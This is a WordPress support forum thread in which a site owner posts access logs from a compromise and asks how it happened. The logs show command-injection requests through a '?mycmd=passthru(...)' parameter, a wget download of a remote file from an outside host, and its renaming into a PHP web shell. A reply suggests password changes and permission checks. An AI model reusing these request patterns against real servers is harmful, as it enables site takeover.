WordPress.org

Support

Support » Miscellaneous » New Exploit?

New Exploit?

  • Hey, just wondering if anybody has experienced this before…

    Last night I was alerted that my server was down, got it rebooted and tried to figure out what happened.

    Looks like somehow somebody got r57 shell uploaded to my server.

    Looking through my access logs:

    80.218.10.244 – – [14/Feb/2008:20:54:25 +0000] “GET /?mycmd=passthru(“id”); HTTP/1.0″ 200 19911 “-” “Snoopy v1.2.3”
    80.218.10.244 – – [14/Feb/2008:20:54:28 +0000] “GET /?mycmd=passthru(“uname+-a”); HTTP/1.0″ 200 19958 “-” “Snoopy v1.2.3”
    80.218.10.244 – – [14/Feb/2008:20:54:33 +0000] “GET /?mycmd=passthru(“w”); HTTP/1.0″ 200 20145 “-” “Snoopy v1.2.3”
    80.218.10.244 – – [14/Feb/2008:20:54:42 +0000] “GET /?mycmd=passthru(“pwd”); HTTP/1.0″ 200 19896 “-” “Snoopy v1.2.3”
    80.218.10.244 – – [14/Feb/2008:20:54:46 +0000] “GET /?mycmd=passthru(“ls+-lah”); HTTP/1.0″ 200 22356 “-” “Snoopy v1.2.3”
    80.218.10.244 – – [14/Feb/2008:20:54:58 +0000] “GET /?mycmd=passthru(“wget+coded.altervista.org%2Fcmd.txt”); HTTP/1.0″ 200 19857 “-” “Snoopy v1.2.3”
    80.218.10.244 – – [14/Feb/2008:20:55:11 +0000] “GET /cmd.txt HTTP/1.1” 200 98799 “-” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11”
    80.218.10.244 – – [14/Feb/2008:20:55:21 +0000] “GET /?mycmd=passthru(“mv+cmd.txt+cmd.php”); HTTP/1.0″ 200 19857 “-” “Snoopy v1.2.3”
    80.218.10.244 – – [14/Feb/2008:20:55:26 +0000] “GET /cmd.php HTTP/1.1” 200 36414 “-” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11”
    80.218.10.244 – – [14/Feb/2008:20:56:20 +0000] “POST /cmd.php HTTP/1.1” 200 33523 “-” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11”

    Any ideas what where the mycmd stuff is done? I can’t find it by doing a recursive grep.

    And I can’t recreate this doing it myself. Any ideas??

    I’ve updated to 2.3.3 this morning

Viewing 1 replies (of 1 total)
  • There is no ‘mycmd’ GET query var in WordPress. Apparently a blind attempt to test for exploits (not hard to guess what ?mycmd= is meant for, though — anyone know of a WP plugin using it?). But I would do the standard of password changes, check of permissions on files/directories, etc.

    [Moderator note: moving to Misc. forum]

Viewing 1 replies (of 1 total)
  • The topic ‘New Exploit?’ is closed to new replies.
Skip to toolbar